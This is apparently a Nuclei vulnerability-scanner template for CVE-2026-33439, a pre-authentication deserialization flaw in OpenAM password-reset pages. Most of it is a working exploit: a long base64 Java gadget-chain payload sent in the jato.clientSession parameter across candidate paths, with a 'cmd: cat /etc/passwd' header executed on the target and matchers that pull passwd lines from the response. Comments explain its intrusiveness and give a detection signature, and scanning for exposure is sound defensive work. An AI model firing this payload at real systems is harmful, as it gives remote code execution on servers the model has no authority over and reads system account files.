# Nuclei template for CVE-2026-33439: an unauthenticated deserialization issue in
# OpenAM's password-reset pages (jato.clientSession parameter). The metadata below
# is what scanners report; the actual probe is defined under `http:` further down.
id: CVE-2026-33439

info:
  name: OpenAM Pre-Auth RCE via jato.clientSession Deserialization
  author: ibonok
  severity: critical
  description: |
    Pre-authentication Remote Code Execution in ForgeRock/OpenIdentityPlatform OpenAM.
    The jato.clientSession parameter on unauthenticated Password Reset pages is
    deserialized via Encoder.deserialize() without any class whitelist filtering.
    Uses Click1 + External Xalan TemplatesImpl gadget chain with JATO RequestManager
    echo technique — command output is returned directly in the HTTP response.
  # The only reference is the upstream fix commit; no affected/fixed version range
  # is stated in this template. Confirm exposure against the deployed build (whether
  # it contains that commit), not from this metadata alone.
  reference:
    - https://github.com/OpenIdentityPlatform/OpenAM/commit/014007c63cacc834cc795a89fac0e611aebc4a32
  classification:
    cvss-score: 9.8
    cve-id: CVE-2026-33439
  tags: cve,cve2026,openam,deserialization,rce,java

variables:
  payload: "AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAABzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAO
bGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-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_0ZFWdn2zcCAAB4cAAAAAF1cgACW0Ks8xf4BghU4AIAAHhwAAAJdsr-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-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__pGQe2AFMZCLYAVjoLLbYAHRJaBL0AClkDEidTtgARLQS9ABVZAxJcU7YAF1cttgAdEl4EvQAKWQOyAGBTtgARLQS9ABVZAxEAyLgAZlO2ABdXLbYAHRJqA70ACrYAES0DvQAVtgAXOgwZDLYAHRJsBL0AClkDEm1TtgARGQwEvQAVWQMZC1O2ABdXGQy2AB0SbwO9AAq2ABEZDAO9ABW2ABdXLbYAHRJxA70ACrYAES0DvQAVtgAXV6cABEuxAAEAAAGGAYkAcwACAHgAAABaABYAAAAJAAYACgAZAAsALwAMAEUADQBpAA4AdgAPAIsAEACdABEApAASAK0AEwC0ABQAzgAVANMAFgDaABcA-gAYAR8AGQE2ABoBWAAbAXAAHAGGAB4BigAfAIAAAAA3AAX_ALQACgcACgcAFQcAFQcAFQcAJwcAgQcAQQcASgcARgcAbQAA_AAZAf8AtwAAAABCBwBzAAABAIMAAAACAIRwdAAFUHduZWRwdwEAeHEAfgAieA"

# Active, intrusive check — not a passive version fingerprint. The request below
# triggers the deserialization and (per the description) runs the command given in
# the `cmd` header on the target, with its output echoed into the response. Even a
# negative result against a patched host is visible in access logs as a request to
# a /ui/PWReset* page carrying a long jato.clientSession value.
http:
  - raw:
      # Comments cannot go inside the `|` block below: they would become part of
      # the request. One GET is sent per basepath × page combination.
      #
      # `payload` (see `variables:`) is a URL-safe base64 blob whose leading
      # characters ("AKztAAVzcg") decode to a single byte followed by the Java
      # serialization magic AC ED 00 05 and a TC_OBJECT/TC_CLASSDESC ("sr") header.
      # That prefix in an unauthenticated jato.clientSession value is a usable
      # detection signature for this traffic.
      #
      # `cmd: cat /etc/passwd` is the command whose output the matcher looks for;
      # it is read-only and produces a stable, easily matched line shape.
      - |
        GET /{{basepath}}/ui/{{page}}?jato.clientSession={{payload}} HTTP/1.1
        Host: {{Hostname}}
        cmd: cat /etc/passwd
        Connection: close

    payloads:
      # Candidate OpenAM deployment context roots.
      basepath:
        - sso
        - openam
        - auth
        - opensso
        - am
      # Unauthenticated password-reset pages named in the description.
      page:
        - PWResetUserValidation
        - PWResetQuestion
        - PWResetSuccess

    # clusterbomb = every basepath × page combination (5 × 3 = 15 requests at most).
    attack: clusterbomb
    # Stop after the first hit so the command is not re-executed on every
    # remaining combination once one context root has responded.
    stop-at-first-match: true

    # Both matchers must hold: a passwd-style root entry in the body AND HTTP 200.
    # Anchoring on root's uid/gid "0:0" rather than on any ":"-separated line makes
    # a reflected request parameter an unlikely false positive (not verified here).
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

    # Reporting only: pulls every passwd-style line out of the body as evidence.
    # group 0 is the whole match; the double-quoted scalar turns `\\d` into the
    # regex escape `\d`.
    extractors:
      - type: regex
        part: body
        group: 0
        regex:
          - "(?m)^.*:.*:\\d+:\\d+:.*$"